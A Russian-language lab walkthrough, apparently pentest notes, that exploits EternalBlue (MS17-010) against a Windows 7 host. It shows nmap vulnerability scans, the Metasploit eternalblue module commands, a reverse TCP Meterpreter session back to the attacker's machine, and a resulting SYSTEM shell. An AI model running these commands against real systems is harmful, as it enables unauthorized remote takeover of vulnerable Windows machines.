** EternalBlue (CVE-2017-0143) MS17-010 "Windows 7/8"**

# ** EternalBlue (CVE-2017-0143) MS17-010 "Windows 7/8"** ## 10.10.122.3 можно просканировать сеть только для одной уязвимости sudo nmap -p 445 -Pn --script smb-vuln-ms17-010 10.10.122.1-200 можно сканировать вообщем на уязвимости sudo nmap -sV --script=`*`vul* 10.10.122.3 ``` VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). ``` sudo msfconsole search ms exploit/windows/ msf6 > use exploit/windows/smb/ms17_010_ ``` use exploit/windows/smb/ms17_010_eternalblue use exploit/windows/smb/ms17_010_eternalblue_win8 use exploit/windows/smb/ms17_010_psexec ``` msf6 > use exploit/windows/smb/ms17_010_eternalblue msf6 exploit(windows/smb/ms17_010_eternalblue) > show options msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.122.3 msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit ``` [*] Started reverse TCP handler on 10.10.122.22:4444 ................................. [*] Meterpreter session 1 opened (10.10.122.22:4444 -> 10.10.122.3:49162) at 2021-12-29 16:15:25 +0600 [+] 10.10.122.3:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 10.10.122.3:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= [+] 10.10.122.3:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= meterpreter > ``` meterpreter > shell ``` Process 2508 created. Channel 1 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. ``` C:\Windows\system32>whoami ``` whoami nt authority\system C:\Windows\system32> ``` **Итог: Мы получили шел доступ к удаленной операционной системе от имени System. это наивысший доступ.**